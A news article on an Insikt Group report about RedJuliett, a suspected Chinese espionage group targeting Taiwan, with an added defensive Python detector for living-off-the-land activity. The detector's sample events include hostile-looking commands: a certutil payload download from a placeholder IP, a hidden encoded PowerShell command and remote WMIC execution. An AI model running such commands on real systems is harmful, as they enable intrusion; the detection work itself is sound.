A cybersecurity team called the Insikt Group published a report on Monday that found Chinese state-sponsored hackers have significantly intensified attacks on Taiwan, seemingly with an eye toward stealing Taiwanese technology and spying on Taiwan’s diplomatic initiatives.
The Insikt Group is the threat research division of Recorded Future, an international cybersecurity firm with both government and corporate clients spread across 75 countries.
The group’s report focused on “RedJuliett,” a cyber-espionage group believed to be sponsored by the Chinese government. RedJuliett’s activity was first publicly documented in August 2023, when Microsoft described a sizable cyber-espionage campaign targeting organizations in Taiwan.
Microsoft dubbed that threat “Flax Typhoon,” while cybersecurity firm CrowdStrike tracked the same activity at roughly the same time under the name “Ethereal Panda.” Insikt Group researchers assess that these designations all refer to the same threat actor.
The group has also targeted organizations in other countries, including South Korea and the United States, but about 60 percent of its detected activity has been focused on Taiwan. RedJuliett’s activity has been traced back to the Chinese city of Fuzhou, which lies across the strait from Taiwan and hosts numerous Chinese intelligence operations targeting the island.
“While RedJuliett’s potential affiliation with either China’s Ministry of State Security (MSS) or People’s Liberation Army (PLA) is currently unknown, an operating location within Fuzhou is consistent with the group’s persistent focus on Taiwan,” the report said.
The Insikt Group observed RedJuliett’s espionage activity against Taiwan between November 2023 and April 2024, hitting “over 70 academic, government, think tank, and technology organizations in Taiwan, as well as multiple de facto embassies operating on the island.”
Taiwan often lacks official embassies from other countries due to China’s political pressure. The de facto American embassy, for example, is an organization called the American Institute in Taiwan (AIT).
The cybersecurity report said:
Within Taiwan, we observed RedJuliett heavily target the technology industry, including organizations in critical technology fields. RedJuliett conducted vulnerability scanning or attempted exploitation against a semiconductor company and two Taiwanese aerospace companies that have contracts with the Taiwanese military.
Taiwan’s presidential election season began around the same time as RedJuliett’s increased activity, culminating in the election of William Lai Ching-te as the successor to President Tsai Ing-wen in January 2024. Lai was inaugurated in May 2024. He belongs to the same Democratic Progressive Party (DPP) as Tsai, so his victory marked the first time in the history of Taiwan’s democracy that the same party held the presidency for three consecutive terms.
The communist Chinese government hates both Tsai and Lai, dubbing them “separatists” and “insurrectionists.” Beijing deployed what Lai denounced as an “unprecedented” level of election interference to intimidate Taiwanese out of voting for him.
“In addition to political and military pressure, it is also using economic means, cognitive warfare, disinformation, threats and incentives. It has resorted to all means to interfere with this election,” Lai said in January.
[Photo: Taiwanese President Lai Ching-te delivers his inaugural speech after being sworn into office during the inauguration ceremony at the Presidential Office Building in Taipei on May 20, 2024. (SAM YEH/AFP via Getty Images)]
The Insikt Group said it could not determine how successful RedJuliett’s intrusions were: its visibility came from network telemetry outside the targeted organizations, so it could see reconnaissance and exploitation attempts but not whether they succeeded or what was taken.
RedJuliett used a range of tooling, including exploits for vulnerabilities in internet-facing network devices, web servers, and security products. The group also relied on “living off the land” (LotL) techniques: rather than dropping custom malware that a scanner might recognize, the intruder does its post-exploitation work with tools already present on the victim’s systems (system administration utilities, scripting interpreters, remote management features), so the activity blends into the routine administrative traffic of a large network. LotL is not new, but it has become a hallmark of Chinese state-sponsored operations.
LotL tactics alarm cybersecurity researchers for two reasons. First, because the attacker runs only legitimate programs, signature-based defenses have little to catch; detection has to rest on who ran which tool, from where, and whether that is normal for the environment. Second, the same techniques let an intruder keep quiet access for long periods, which raises the concern that some of that access is being held in reserve for a future crisis, such as a conflict involving the sponsoring country, rather than used for immediate theft or disruption.
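Because LotL activity consists of legitimate programs, defenders detect it from behaviour rather than file signatures: which built-in tool ran, with what arguments, under which account, and whether that combination is normal for that host. The following is an added example, not code from Recorded Future’s report or anything attributed to RedJuliett: a small detector that scans constructed process-creation events for a few widely abused Windows built-ins (certutil, PowerShell, WMIC, mshta, schtasks) and suppresses matches that a baseline of known administrative activity explains. The event format (tab-separated timestamp, host, user, command line), the host and user names, the rules, and the 203.0.113.10 address are all illustrative assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int      # 1-based line number in the event feed
    technique: str    # which LOLBin behaviour matched
    host: str
    user: str
    command: str


# Illustrative rules for a few commonly abused Windows built-ins ("LOLBins").
# These are generic patterns for demonstration, not RedJuliett's actual commands.
LOLBIN_RULES = [
    (re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I),
     "certutil used as a downloader"),
    (re.compile(r"\bpowershell(\.exe)?\b.*(-enc|-encodedcommand)\b", re.I),
     "PowerShell encoded command"),
    (re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I),
     "WMIC process creation (often remote)"),
    (re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I),
     "mshta loading a remote script"),
    (re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I),
     "scheduled task creation"),
]

# Constructed process-creation events: timestamp, host, user, command line,
# tab-separated. Hosts, users and the 203.0.113.10 address are made up.
SAMPLE_EVENTS = """\
2024-03-02T01:12:09Z\tTPE-WS07\tCORP\\jlin\tC:\\Windows\\System32\\notepad.exe report.docx
2024-03-02T01:13:44Z\tTPE-WS07\tCORP\\jlin\tcertutil.exe -urlcache -split -f http://203.0.113.10/u.txt C:\\Users\\Public\\u.txt
2024-03-02T01:14:02Z\tTPE-WS07\tCORP\\jlin\tpowershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-03-02T01:20:31Z\tTPE-SRV02\tCORP\\svc_backup\tschtasks.exe /create /tn Backup /tr C:\\bk\\run.bat /sc daily
2024-03-02T01:25:18Z\tTPE-SRV02\tCORP\\jlin\twmic.exe /node:TPE-FS01 process call create "cmd.exe /c whoami"
2024-03-02T01:30:00Z\tTPE-WS07\tCORP\\jlin\tC:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE
"""

# Baseline of (user, technique) pairs that are expected in this environment.
# In practice this is learned from weeks of telemetry; here it is assumed.
BASELINE = frozenset({
    ("CORP\\svc_backup", "scheduled task creation"),
})


def parse_event(line: str) -> dict:
    """Split one tab-separated event into its four fields."""
    ts, host, user, cmd = line.split("\t", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def detect_lotl(events_text: str, baseline: frozenset = frozenset()) -> list:
    """Return a Finding for every event whose command line matches a LOLBin
    rule, unless the (user, technique) pair is explained by the baseline."""
    findings = []
    for n, line in enumerate(events_text.splitlines(), 1):
        if not line.strip():
            continue
        ev = parse_event(line)
        for pattern, technique in LOLBIN_RULES:
            if pattern.search(ev["cmd"]) and (ev["user"], technique) not in baseline:
                findings.append(Finding(n, technique, ev["host"], ev["user"], ev["cmd"]))
    return findings


if __name__ == "__main__":
    for f in detect_lotl(SAMPLE_EVENTS, BASELINE):
        print(f"line {f.line_no}: {f.technique} | {f.host} {f.user} | {f.command}")
```

Run without a baseline, the detector flags four events, including the backup account’s nightly `schtasks /create`; with the baseline it reports three: the certutil download, the encoded PowerShell command, and the WMIC process creation on another host, all under one user account on one workstation within a few minutes. That clustering, rather than any single command, is what a practitioner would escalate. The rules are deliberately narrow; real deployments pair them with parent-process and network context, and the baseline is what keeps a rule like the schtasks one from drowning the analyst in routine administration.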
The report concluded:
RedJuliett’s activities align with Beijing’s objectives to gather intelligence on Taiwan’s economic policy, trade, and diplomatic relations. The group also targeted multiple critical technology companies, highlighting the strategic importance of this sector for Chinese state-sponsored threat actors.
The Chinese Foreign Ministry disputed Recorded Future’s report on Monday, the same way it dismisses all allegations of Chinese hacker activity.
Chinese Foreign Ministry spokeswoman Mao Ning claimed she was “not aware” of the report, but she claimed, without evidence, that Recorded Future “fabricated disinformation on so-called Chinese hacking operations” in the past, so the company has “no professionalism or credibility.”